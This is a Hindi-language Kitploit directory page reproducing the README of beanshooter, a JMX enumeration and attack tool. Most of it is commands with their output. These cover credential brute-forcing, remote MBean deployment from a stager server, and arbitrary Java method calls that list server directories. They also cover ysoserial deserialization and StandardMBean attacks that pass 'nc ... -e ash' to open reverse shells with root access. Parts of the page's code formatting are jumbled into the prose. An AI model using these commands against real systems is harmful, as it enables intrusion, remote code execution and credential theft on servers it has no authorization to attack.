Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
beanshooter — JMX गणना और हमला उपकरण। | Kitploit
उपकरण/GitHubGitHub/qtc-de/beanshooter
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंग
GitHubqtc-de/beanshooter

beanshooter

JMX गणना और हमला उपकरण।

रिपॉजिटरी देखें
509553 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

beanshooter


beanshooter एक JMX गणना और आक्रमण उपकरण है, जो JMX एंडपॉइंट्स पर सामान्य कमजोरियों की पहचान करने में मदद करता है।

https://user-images.githubusercontent.com/49147108/183278179-4a5566a7-5af8-4ce8-a73d-1016876a36d5.mp4

स्थापना


beanshooter एक maven प्रोजेक्ट है और इसकी स्थापना सीधी होनी चाहिए। maven स्थापित होने पर, एक निष्पादन योग्य .jar फ़ाइल बनाने के लिए निम्नलिखित कमांड निष्पादित करें:```console [qtc@devbox ~]$ git clone https://github.com/qtc-de/beanshooter [qtc@devbox ~]$ cd beanshooter [qtc@devbox ~]$ mvn package

root@kitploit:~
आप प्रीबिल्ट पैकेज का भी उपयोग कर सकते हैं जो [प्रत्येक रिलीज़](https://github.com/qtc-de/beanshooter/releases) के लिए बनाए जाते हैं। डेवलपमेंट ब्रांच के लिए प्रीबिल्ट पैकेज स्वचालित रूप से बनाए जाते हैं और *GitHub* [एक्शन पेज](https://github.com/qtc-de/beanshooter/actions) पर पाए जा सकते हैं। साथ ही *beanshooter* चलाने के लिए एक प्रीबिल्ट डॉकर इमेज [उपलब्ध है](#docker-image)।

*beanshooter* में *ysoserial* को निर्भरता के रूप में शामिल नहीं किया गया है। *ysoserial* समर्थन सक्षम करने के लिए, आपको या तो अपनी ``ysoserial.jar`` फ़ाइल का पथ अतिरिक्त तर्क के रूप में निर्दिष्ट करना होगा (उदाहरण के लिए ``--yso /opt/ysoserial.jar``) या प्रोजेक्ट बनाने से पहले [beanshooter कॉन्फ़िगरेशन फ़ाइल](https://github.com/qtc-de/beanshooter/blob/HEAD/beanshooter/config.properties) में डिफ़ॉल्ट पथ बदलना होगा।

*beanshooter* *bash* के लिए स्वतः पूर्णता का समर्थन करता है। स्वतः पूर्णता का लाभ उठाने के लिए, आपके पास [completion-helpers](https://github.com/qtc-de/completion-helpers) प्रोजेक्ट स्थापित होना चाहिए। यदि सही ढंग से सेटअप किया गया है, तो [समापन स्क्रिप्ट](https://github.com/qtc-de/beanshooter/blob/HEAD/resources/bash_completion.d/beanshooter) को अपने ``~/.bash_completion.d`` फ़ोल्डर में कॉपी करने से स्वतः पूर्णता सक्षम हो जाती है।```console
[qtc@devbox ~]$ cp resources/bash_completion.d/beanshooter ~/bash_completion.d/

विषय सूची


  • समर्थित संचालन
    • मूल संचालन
      • attr
      • brute
      • deploy
      • enum
      • info
      • invoke
      • jolokia
      • list
      • model
      • serial
      • stager
      • standard
      • undeploy
    • MBean संचालन
      • generic
        • attr
        • info
        • invoke
        • stats
        • status
        • export
        • deploy
        • undeploy
      • diagnostic
        • read
        • load
        • logfile
        • nolog
        • cmdline
        • props
      • hotspot
        • dump
        • list
        • get
        • set
      • mlet
        • load
      • recorder
        • new
        • start
        • stop
        • read
        • dump
      • tomcat
        • dump
        • list
        • write
      • tonka

समर्थित संचालन


बीनशूटर के विभिन्न संचालनों को दो समूहों में विभाजित किया जा सकता है: मूल संचालन और MBean संचालन। जबकि मूल संचालन किसी JMX एंडपॉइंट पर सामान्य संचालन करने के लिए उपयोग किए जाते हैं, MBean संचालन एक विशिष्ट MBean को लक्षित करते हैं जिसके साथ बातचीत की जा सके। अधिक जानकारी के लिए, निम्नलिखित अनुभागों में उपयोग उदाहरण देखें।```console [qtc@devbox ~]$ beanshooter -h usage: beanshooter [-h] ...

beanshooter v3.0.0 - a JMX enumeration and attacking tool

positional arguments:

Basic Operations attr set or get MBean attributes brute bruteforce JMX credentials deploy deploys the specified MBean on the JMX server enum enumerate the JMX service for common vulnerabilities info display method and attribute information on an MBean invoke invoke the specified method on the specified MBean list list available MBEans on the remote MBean server serial perform a deserialization attack stager start a stager server to deliver MBeans undeploy undeploys the specified MBEAN from the JMX server

MBean Operations diagnostic Diagnostic Command MBean hotspot HotSpot Diagnostic MBean mlet default JMX bean that can be used to load additional beans dynamically recorder jfr Flight Recorder MBean tomcat tomcat MemoryUserDatabaseMBean used for user management tonka general purpose bean for executing commands and uploading or download files

named arguments: -h, --help show this help message and exit

root@kitploit:~
### मूल संचालन

---

मूल संचालन सामान्य प्रयोजन संचालन हैं जो JMX सेवा पर किए जा सकते हैं। ये आमतौर पर ऐसे संचालन होते हैं जो किसी विशिष्ट MBean को लक्ष्य नहीं करते या जो ऐसे MBean को लक्ष्य करते हैं जिसमें beanshooter द्वारा कोई अंतर्निहित समर्थन नहीं है।

#### Attr

`attr` कार्रवाई का उपयोग किसी निर्दिष्ट *MBean* पर गुणों को प्राप्त करने या सेट करने के लिए किया जा सकता है। उपलब्ध गुणों को प्राप्त करने के लिए, `info` कार्रवाई का उपयोग किया जाना चाहिए:```console
[qtc@devbox ~]$ beanshooter info 172.17.0.2 9010
...
[+] MBean Class: sun.management.MemoryImpl
[+] ObjectName: java.lang:type=Memory
[+]
[+]     Attributes:
[+]         Verbose (type: boolean , writable: true)
[+]         ObjectPendingFinalizationCount (type: int , writable: false)
[+]         HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+]         NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+]         ObjectName (type: javax.management.ObjectName , writable: false)
[+]
[+]     Operations:
[+]         void gc()

जब केवल विशेषता नाम निर्दिष्ट किया जाता है, beanshooter वर्तमान विशेषता मान प्राप्त करता है और प्रदर्शित करता है:```console [qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose false

root@kitploit:~
जब कोई अतिरिक्त मान निर्दिष्ट किया जाता है, *beanshooter* संबंधित विशेषता सेट करने का प्रयास करता है। उन विशेषताओं के लिए जिनका प्रकार *String* से भिन्न है, `--type` विकल्प का उपयोग करके विशेषता प्रकार निर्दिष्ट करना आवश्यक है:```console
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose
true

Brute

brute कार्रवाई पासवर्ड-संरक्षित JMX सेवा पर ब्रूटफोर्स हमला करती है। जब बिना किसी अतिरिक्त वैकल्पिक तर्क के चलाया जाता है, तो beanshooter कुछ सामान्य उपयोगकर्ता-नाम और पासवर्ड संयोजनों वाली एक अंतर्निहित वर्डलिस्ट का उपयोग करता है। अधिक समर्पित हमलों के लिए आपको --username-file और --password-file विकल्पों का उपयोग करके अधिक विस्तृत वर्डलिस्ट निर्दिष्ट करनी चाहिए।```console [qtc@devbox ~]$ beanshooter brute 172.17.0.2 1090 [+] Reading wordlists for the brute action. [+] Reading credentials from internal wordlist. [+] [+] Starting bruteforce attack with 10 credentials. [+] [+] Found valid credentials: admin:admin [+] [10 / 10] [########################################] 100% [+] [+] done.

root@kitploit:~
#### तैनात करना

`deploy` क्रिया का उपयोग किसी *JMX* सेवा पर *MBean* तैनात करने के लिए किया जा सकता है। इस क्रिया **नहीं** का उपयोग डिफ़ॉल्ट समर्थन वाले *MBeans* को तैनात करने के लिए किया जाना चाहिए
जैसे कि *TonkaBean*। डिफ़ॉल्ट समर्थन वाले *MBeans* को तैनात करना संबंधित
[एमबीन संचालन](#mbean-operations) के माध्यम से किया जाना चाहिए।

जब आप जिस *MBean* को तैनात करना चाहते हैं वह पहले से *JMX* सेवा को ज्ञात है, तो कार्यान्वित करने वाले
*MBean* वर्ग का वर्ग नाम और वांछित `ObjectName`:```console
[qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 javax.management.monitor.StringMonitor qtc.test:type=Monitor
[+] Starting MBean deployment.
[+]
[+] 	Deplyoing MBean: StringMonitor
[+] 	MBean with object name qtc.test:type=Monitor was successfully deployed.

जब MBean वर्ग JMX सेवा को ज्ञात नहीं है, तो आप एक कार्यान्वयन प्रदान करने के लिए --jar-file और --stager-url विकल्पों का उपयोग कर सकते हैं:```console [qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000 [+] Starting MBean deployment. [+] [+] Deplyoing MBean: ExampleBean [+] [+] MBean class is not known to the server. [+] Starting MBean deployment. [+] [+] Deplyoing MBean: MLet [+] MBean with object name DefaultDomain:type=MLet was successfully deployed. [+] [+] Loading MBean from http://172.17.0.1:8000 [+] [+] Creating HTTP server on: 172.17.0.1:8000 [+] Creating MLetHandler for endpoint: / [+] Creating JarHandler for endpoint: /c65c3cdc908348d8bd9a22b8a2bf8be3 [+] Starting HTTP server... [+] [+] Incoming request from: iinsecure.example [+] Requested resource: / [+] Sending mlet: [+] [+] Class: non.existing.example.ExampleBean [+] Archive: c65c3cdc908348d8bd9a22b8a2bf8be3 [+] Object: qtc.test:type=Example [+] Codebase: http://172.17.0.1:8000 [+] [+] Incoming request from: iinsecure.example [+] Requested resource: /c65c3cdc908348d8bd9a22b8a2bf8be3 [+] Sending jar file with md5sum: c4d8f40d1c1ac7f3cf7582092802a484 [+] [+] MBean with object name qtc.test:type=Example was successfully deployed.

root@kitploit:~
#### Enum

`enum` कार्रवाई एक *JMX* एंडपॉइंट पर कुछ कॉन्फ़िगरेशन विवरणों को सूचीबद्ध करती है। यह हमेशा जाँचती है कि क्या *JMX* एंडपॉइंट्स को प्रमाणीकरण की आवश्यकता है और क्या यह पूर्व-प्रमाणित मनमानी डिसीरियलाइज़ेशन की अनुमति देता है।```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090
[+] Checking for unauthorized access:
[+]
[+] 	- Remote MBean server requires authentication.
[+] 	  Vulnerability Status: Non Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] 	- Remote MBeanServer accepted the payload class.
[+] 	  Configuration Status: Non Default

जब प्रमाणीकरण आवश्यक नहीं है, या जब मान्य क्रेडेंशियल निर्दिष्ट किए गए थे, तो enum क्रिया JMX एंडपॉइंट से कुछ और जानकारी को सूचीबद्ध करने का प्रयास भी करती है। इसमें गैर-डिफ़ॉल्ट MBeans की सूची और उदाहरण के लिए, Apache Tomcat सर्वर पर पंजीकृत उपयोगकर्ता खाते शामिल हैं:```console [qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090 [+] Checking for unauthorized access: [+] [+] - Remote MBean server does not require authentication. [+] Vulnerability Status: Vulnerable [+] [+] Checking pre-auth deserialization behavior: [+] [+] - Remote MBeanServer rejected the payload class. [+] Vulnerability Status: Non Vulnerable [+] [+] Checking available MBeans: [+] [+] - 57 MBeans are currently registred on the MBean server. [+] Listing 39 non default MBeans: [+] - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=Valve,host=localhost,name=AccessLogValve) [+] - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=GlobalRequestProcessor,name="http-nio-8080") [...] [+] [+] Enumerating tomcat users: [+] [+] - Listing 3 tomcat users: [+] [+] ---------------------------------------- [+] Username: manager [+] Password: P@55w0rD# [+] Roles: [+] Users:type=Role,rolename="manager-gui",database=UserDatabase [+] Users:type=Role,rolename="manager-script",database=UserDatabase [+] Users:type=Role,rolename="manager-jmx",database=UserDatabase [+] Users:type=Role,rolename="manager-status",database=UserDatabase [+] [+] ---------------------------------------- [+] Username: admin [+] Password: s3cr3T!$ [+] Roles: [+] Users:type=Role,rolename="admin-gui",database=UserDatabase [+] Users:type=Role,rolename="admin-script",database=UserDatabase [...]

root@kitploit:~
जब *SASL* संरक्षित एंडपॉइंट पर `enum` क्रिया का उपयोग किया जाता है, तो *beanshooter* सर्वर के लिए कॉन्फ़िगर किए गए *SASL* प्रोफ़ाइल को सूचीबद्ध करने का प्रयास करता है। यह केवल एक निश्चित सीमा तक संभव है और सर्वर के *TLS* कॉन्फ़िगरेशन को सूचीबद्ध नहीं किया जा सकता है। यदि *beanshooter* द्वारा पहचाना गया *SASL* प्रोफ़ाइल काम नहीं करता है, तो आपको हमेशा `--ssl` विकल्प के साथ/बिना पुनः प्रयास करना चाहिए:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4447 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] 	- Remote JMXMP server uses SASL/DIGEST-MD5 SASL profile.
[+] 	  Credentials are requried and the following hostname must be used: iinsecure.example
[+] 	  Notice: TLS setting cannot be enumerated and --ssl may be required.
[+] 	  Vulnerability Status: Non Vulnerable
...

Info

info क्रिया का उपयोग MBean सर्वर पर उपलब्ध MBeans की विधि और विशेषता जानकारी प्राप्त करने के लिए किया जा सकता है। जब बिना अतिरिक्त तर्कों के आह्वान किया जाता है, तो सभी उपलब्ध MBeans की विधि और विशेषता जानकारी मुद्रित होती है। जब एक अतिरिक्त ObjectName निर्दिष्ट करते हैं, तो केवल निर्दिष्ट MBean की विधि और विशेषता जानकारी मुद्रित होती है:```console [qtc@devbox ~]$ beanshooter info 172.17.0.2 9010 java.lang:type=Memory [+] MBean Class: sun.management.MemoryImpl [+] ObjectName: java.lang:type=Memory [+] [+] Attributes: [+] Verbose (type: boolean , writable: true) [+] ObjectPendingFinalizationCount (type: int , writable: false) [+] HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false) [+] NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false) [+] ObjectName (type: javax.management.ObjectName , writable: false) [+] [+] Operations: [+] void gc()

root@kitploit:~
#### Invoke

`invoke` क्रिया का उपयोग किसी *MBean* पर एक मनमानी विधि को लागू करने के लिए किया जा सकता है जो पहले से *JMX* एंडपॉइंट पर तैनात की गई है।
एंडपॉइंट के अलावा, `invoke` क्रिया में लक्षित *MBean* का `ObjectName` और आप जिस विधि हस्ताक्षर को लागू करना चाहते हैं, वह आवश्यक है। यदि निर्दिष्ट विधि तर्कों की अपेक्षा करती है, तो उन्हें भी निर्दिष्ट करना होगा। निम्नलिखित सूची एक उदाहरण दिखाती है,
एक तर्कहीन विधि आह्वान का, जहाँ `DiagnosticCommand` *MBean* की `vmVersion()` विधि लागू की जाती है:```console
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'
OpenJDK 64-Bit Server VM version 11.0.14.1+1
JDK 11.0.14.1

जब किसी ऐसी विधि को कॉल किया जाता है जिसमें पैरामीटर की आवश्यकता होती है, तो निर्दिष्ट beanshooter तर्कों को Java कोड के रूप में मूल्यांकित किया जाता है। सरल तर्क प्रकार जैसे पूर्णांक या स्ट्रिंग को उनके संगत मान निर्दिष्ट करके पारित किया जा सकता है। जटिल तर्क प्रकारों को Java में जैसे आप करते हैं वैसे ही बनाया जा सकता है (जैसे 'new java.util.HashMap()'). निम्नलिखित सूची एक उदाहरण दिखाती है, जहाँ DiagnosticCommand MBean पर help(String[] args) विधि को कॉल किया गया है:```console [qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'help(String[] args)' 'new String[] { "Compiler.directives_add" }' Compiler.directives_add Add compiler directives from file.

Impact: Low

Permission: java.lang.management.ManagementPermission(monitor)

Syntax : Compiler.directives_add

Arguments: filename : Name of the directives file (STRING, no default value)

root@kitploit:~
अधिक जटिल प्रकार के तर्कों के लिए जिनमें कुछ आरंभीकरण की आवश्यकता होती है, आप *beanshooters PluginSystem* का उपयोग कर सकते हैं और एक कस्टम
क्लास परिभाषित कर सकते हैं जो [IArgumentProvider Interface](https://github.com/qtc-de/beanshooter/blob/HEAD/beanshooter/src/de/qtc/beanshooter/plugin/IArgumentProvider.java) को लागू करता है।


#### Jolokia

जैसा कि *beanshooters* के [Jolokia दस्तावेज़ीकरण](https://github.com/qtc-de/beanshooter/blob/HEAD/docs/jolokia.md) में उल्लिखित है, लगभग सभी *beanshooter* क्रियाओं का उपयोग `--jolokia` स्विच के साथ *Jolokia* आधारित *JMX* एंडपॉइंट्स को लक्षित करने के लिए किया जा सकता है। *Jolokia JMX* एडाप्टर के लिए इस सामान्य समर्थन के अलावा, *beanshooter* एक समर्पित `jolokia` क्रिया का समर्थन करता है। इस क्रिया का उपयोग एक *Jolokia* एजेंट को बाहरी कनेक्शन के लिए बाध्य करने के लिए किया जा सकता है, जो प्रॉक्सी मोड सक्षम होने पर चल रहा हो:```console
[qtc@devbox ~]$ beanshooter jolokia 172.17.0.2 8080 172.17.0.1 4444 --username manager --password admin --ldap
[+] Attempting to trigger outboud connection to 172.17.0.1:4444
[+] Using proxy service URL: service:jmx:Rmi:///jndi/ldap://172.17.0.1:4444/beanshooter
...

[qtc@devbox ~]$ nc -vlp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:60052.
0

वही परिणाम एक नियमित beanshooter ऑपरेशन जैसे list को आह्वान करके और --jolokia-proxy service:jmx:... विकल्प का उपयोग करके प्राप्त किया जा सकता है। jolokia क्रिया को एक शॉर्टकट के रूप में जोड़ा गया था ताकि आपको JNDI सिंटैक्स याद रखने की आवश्यकता न हो। jolokia क्रिया का उपयोग करते समय, डिफ़ॉल्ट रूप से --jolokia विकल्प मान लिया जाता है।

सूची

list क्रिया रिमोट JMX सेवा पर सभी पंजीकृत MBeans की एक सूची प्रिंट करती है:```console [qtc@devbox ~]$ beanshooter list 172.17.0.2 9010 [+] Available MBeans: [+] [+] - sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager) [+] - sun.management.MemoryPoolImpl (java.lang:name=Metaspace,type=MemoryPool) [+] - javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate) [...]

root@kitploit:~
#### मॉडल

`model` क्रिया सबसे शक्तिशाली *beanshooter* ऑपरेशनों में से एक है और [Markus Wulftange](https://twitter.com/mwulftange) द्वारा पहचानी गई एक तकनीक को लागू करती है जो आपको मनमाने *public* और *static* Java विधियों को आमंत्रित करने की अनुमति देती है। इसके अलावा, *public* ऑब्जेक्ट विधियों को उपयोगकर्ता द्वारा बनाए गए ऑब्जेक्ट इंस्टेंस पर भी आमंत्रित किया जा सकता है। एकमात्र आवश्यकता यह है कि उपयोग की गई विधि तर्क और प्रदान किया गया ऑब्जेक्ट इंस्टेंस (*non static* विधियों के लिए) serializable होने चाहिए।

निम्नलिखित सूची एक उदाहरण उपयोग दिखाती है, जहां एक `File` ऑब्जेक्ट को ऑब्जेक्ट इंस्टेंस के रूप में प्रदान किया गया है और उस पर `String[] list()` ऑपरेशन आमंत्रित किया गया है:```console
[qtc@devbox ~]$ beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
[+] Deploying RequiredModelMBean supporting methods from java.io.File
[+]
[+] 	Deplyoing MBean: RequiredModelMBean
[+] 	MBean with object name de.qtc.beanshooter:version=1 was successfully deployed.
[+]
[+] 	Available Methods:
[+] 	  - java.lang.String toString()
[+] 	  - int hashCode()
[+] 	  - [Ljava.lang.String; list()
[...]
[+] 	  - void setManagedResource(java.lang.Object, java.lang.String)
[+]
[+] 	Setting managed resource to: new java.io.File("/")
[+] 	Managed resource was set successfully.
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
root
var
opt
srv
bin
mnt
dev
proc
etc
usr
lib
tmp
home
run
media
sbin
sys
.dockerenv

setManagedResource विधि हमेशा उपलब्ध होती है और इसका उपयोग संचालन के लिए ऑब्जेक्ट इंस्टेंस को बदलने के लिए किया जा सकता है:```console [qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/etc")' objectReference [+] Call was successful. [qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()' passwd shells opt modules mtab issue inittab hosts ...

root@kitploit:~
जब *static* विधियों को लागू किया जाता है, तो एक ऑब्जेक्ट इंस्टेंस भी आवश्यक होता है। हालांकि, ऑब्जेक्ट इंस्टेंस का वास्तविक वर्ग मायने नहीं रखता। उदाहरण के लिए, यदि आप `java.lang.System` से `getProperties()` को लागू करना चाहते हैं, तो आप ऑब्जेक्ट इंस्टेंस के रूप में एक साधारण `String` का भी उपयोग कर सकते हैं। इस मामले में केवल निर्दिष्ट वर्ग का नाम मायने रखता है:```console
[qtc@devbox ~]$ beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.lang.System '"does not matter"'
[+] Deploying RequiredModelMBean supporting methods from java.lang.System
[+]
[+] 	Deplyoing MBean: RequiredModelMBean
[+] 	MBean with object name de.qtc.beanshooter:version=1 was successfully deployed.
[+]
[+] 	Available Methods:
[+] 	  - void runFinalization()
[+] 	  - java.lang.String setProperty(java.lang.String, java.lang.String)
[+] 	  - java.lang.String getProperty(java.lang.String)
[+] 	  - java.lang.String getProperty(java.lang.String, java.lang.String)
[+] 	  - long currentTimeMillis()
[+] 	  - long nanoTime()
[+] 	  - java.lang.SecurityManager getSecurityManager()
[+] 	  - void loadLibrary(java.lang.String)
[+] 	  - java.lang.String mapLibraryName(java.lang.String)
[+] 	  - void load(java.lang.String)
[+] 	  - java.lang.String lineSeparator()
[+] 	  - java.io.Console console()
[+] 	  - java.nio.channels.Channel inheritedChannel()
[+] 	  - java.util.Properties getProperties()
[+] 	  - void setProperties(java.util.Properties)
[+] 	  - java.lang.String clearProperty(java.lang.String)
[+] 	  - java.util.Map getenv()
[+] 	  - java.lang.String getenv(java.lang.String)
[+] 	  - void gc()
[+] 	  - void wait()
[+] 	  - java.lang.String toString()
[+] 	  - int hashCode()
[+] 	  - java.lang.Class getClass()
[+] 	  - void notify()
[+] 	  - void notifyAll()
[+] 	  - void setManagedResource(java.lang.Object, java.lang.String)
[+]
[+] 	Setting managed resource to: "does not matter"
[+] 	Managed resource was set successfully.
[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'getProperties()'
java.vm.info
  --> mixed mode
java.runtime.version
  --> 11.0.18+10-alpine-r0
sun.io.unicode.encoding
  --> UnicodeLittle
...

model क्रिया निर्दिष्ट वर्ग पर उपलब्ध विधियों को निर्धारित करने के लिए रिफ्लेक्शन का उपयोग करती है। यदि आपके पास वर्ग स्थानीय रूप से उपलब्ध नहीं है, तब भी आप --signature या --signature-file विकल्पों के माध्यम से उपलब्ध विधियों को निर्दिष्ट करके इसका उपयोग कर सकते हैं। हालांकि, डिफ़ॉल्ट वर्गों तक पहुंच प्राप्त करने के लिए आपको एक ऑब्जेक्ट उदाहरण प्रदान करना होगा जो डिफ़ॉल्ट वर्ग ( rt.jar में मौजूद नहीं) भी नहीं है। यह आवश्यक है, क्योंकि लक्ष्य वर्ग को प्रदान किए गए ऑब्जेक्ट उदाहरण के समान ClassLoader द्वारा लोड किया जाना चाहिए। beanshooters example-server के लिए, javax.management.remote.message.VersionMessage उपयुक्त है, क्योंकि यह वर्ग opendmk_jmxremote_optional_jar में मौजूद है जो क्लाइंट और सर्वर दोनों में उपलब्ध है। हम इस ऑब्जेक्ट उदाहरण का उपयोग करके अन्य कस्टम वर्गों, जैसे de.qtc.beanshooter.server.utils.Logger पर विधियाँ लागू कर सकते हैं:```console [qtc@devbox ~]$ beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=0 de.qtc.beanshooter.server.utils.Logger 'new javax.management.remote.message.VersionMessage("test")' --signature 'String getIndent()' [+] Deploying RequiredModelMBean supporting user specified methods [+] [+] Deplyoing MBean: RequiredModelMBean [+] MBean with object name de.qtc.beanshooter:version=0 was successfully deployed. [+] [+] Available Methods: [+] - String getIndent() [+] - void setManagedResource(java.lang.Object, java.lang.String) [+] [+] Setting managed resource to: new javax.management.remote.message.VersionMessage("test") [+] Managed resource was set successfully. [qtc@devbox ~]$ beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=0 --signature 'String getIndent()' EMPTY OUTPUT - Just an Indent ;)

root@kitploit:~
यदि आप `model` क्रिया द्वारा कार्यान्वित तकनीक के बारे में अधिक जानना चाहते हैं, तो मैं अत्यधिक
[CODE WHITE](https://twitter.com/codewhitesec) द्वारा लिखित इस [ब्लॉग पोस्ट](https://codewhitesec.blogspot.com/2023/03/jmx-exploitation-revisited.html) की सिफारिश करता हूँ
जो इसे बहुत विस्तार से समझाती है।


#### Serial

`serial` क्रिया का उपयोग *JMX* एंडपॉइंट पर deserialization हमले करने के लिए किया जा सकता है। डिफ़ॉल्ट रूप से, यह क्रिया
प्रमाणीकरण के बाद deserialization हमलों का प्रयास करती है। इसके काम करने के लिए, आपके लक्ष्य *JMX* सेवा को या तो
अनअथेंटिकेटेड पहुँच की अनुमति देनी होगी या आपके पास वैध क्रेडेंशियल्स होने चाहिए:```console
[qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin
[+] Attemting deserialization attack on JMX endpoint.
[+]
[+] 	Creating ysoserial payload... done.
[+] 	MBeanServer attempted to deserialize the DeserializationCanary class.
[+] 	Deserialization attack was probably successful.

[qtc@devbox ~]$ nc -vlp 4444
[...]
id
uid=0(root) gid=0(root) groups=0(root)

JMX सेवाएं भी पूर्व-प्रमाणित डिसीरियलाइज़ेशन हमलों के लिए असुरक्षित हो सकती हैं। इसका दुरुपयोग करने के लिए, आप --preauth स्विच का उपयोग कर सकते हैं:```console [qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --preauth [+] Attemting deserialization attack on JMX endpoint. [+] [+] Creating ysoserial payload... done. [+] MBeanServer attempted to deserialize the DeserializationCanary class. [+] Deserialization attack was probably successful.

[qtc@devbox ~]$ nc -vlp 4444 [...] id uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
Against *JMXMP* endpoints, preauthenticated deserialization is usually possible. Unfortunately, there is no way to enumerate this properly
during the `enum` action. If you encounter a *JMXMP* endpoint, you should just give it a try.

#### Stager

The `stager` action starts a stager server that can be used to deliver *MBeans*. Creating a stager server
for *MBean* delivery is normally done automatically when using *beanshooters* `deploy` action. However,
sometimes it is required to use a standalone server. When using the `stager` action, you can either specify
the name of a builtin *MBean* to deliver (e.g. `tonka`) or the `custom` keyword. If `custom` was specified,
the `--class-name`, `--object-name` and `--jar-file` options are required.```console
[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8888 --no-stager
[qtc@devbox ~]$ beanshooter stager 172.17.0.1 8888 tonka
[+] Creating HTTP server on: 172.17.0.1:8888
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /93691b8bae4143f087f7a3123641b20d
[+] Starting HTTP server.
[+] 
[+] Press Enter to stop listening.
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] 	Class:     de.qtc.beanshooter.tonkabean.TonkaBean
[+] 	Archive:   93691b8bae4143f087f7a3123641b20d
[+] 	Object:    MLetTonkaBean:name=TonkaBean,id=1
[+] 	Codebase:  http://172.17.0.1:8888
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /93691b8bae4143f087f7a3123641b20d
[+] Sending jar file with md5sum: 6568ffb2934cb978dbd141848b8b128a

मानक

standard क्रिया एक StandardMBean तैनात करती है जो विभिन्न लक्ष्यों को प्राप्त करने के लिए TemplateImpl वर्ग को लागू करता है। यह तकनीक Markus Wulftange द्वारा पहचानी गई थी और beanshooter इसे कमांड निष्पादन, फ़ाइल अपलोड और TonkaBean परिनियोजन की अनुमति देने के लिए लागू करता है।```console [qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash' [+] Creating a TemplateImpl payload object to abuse StandardMBean [+] [+] Deplyoing MBean: StandardMBean [+] MBean with object name de.qtc.beanshooter:standard=3873612041699 was successfully deployed. [+] [+] Caught NullPointerException while invoking the newTransformer action. [+] This is expected bahavior and the attack most likely worked :) [+] [+] Removing MBean with ObjectName de.qtc.beanshooter:standard=3873612041699 from the MBeanServer. [+] MBean was successfully removed. ... [qtc@devbox ~]$ nc -vlp 4444 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 172.17.0.2. Ncat: Connection from 172.17.0.2:40033. id uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
